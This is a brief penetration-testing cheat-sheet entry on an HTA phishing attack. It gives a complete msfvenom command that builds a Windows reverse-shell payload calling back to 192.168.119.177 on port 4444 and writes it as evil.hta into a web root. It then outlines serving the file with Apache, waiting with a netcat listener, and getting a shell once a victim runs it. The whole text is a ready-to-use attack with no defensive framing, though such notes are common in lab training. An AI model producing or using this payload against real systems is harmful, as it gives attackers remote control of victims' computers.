msfvenom hta attack

#Craft a payload

sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.177 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta

#Check the newly created file

#Start a netcat listener and serve the evil.hta at /var/www/html with apache

#Once the victim clicks on run it will trigger the revshell

#Shell

Last updated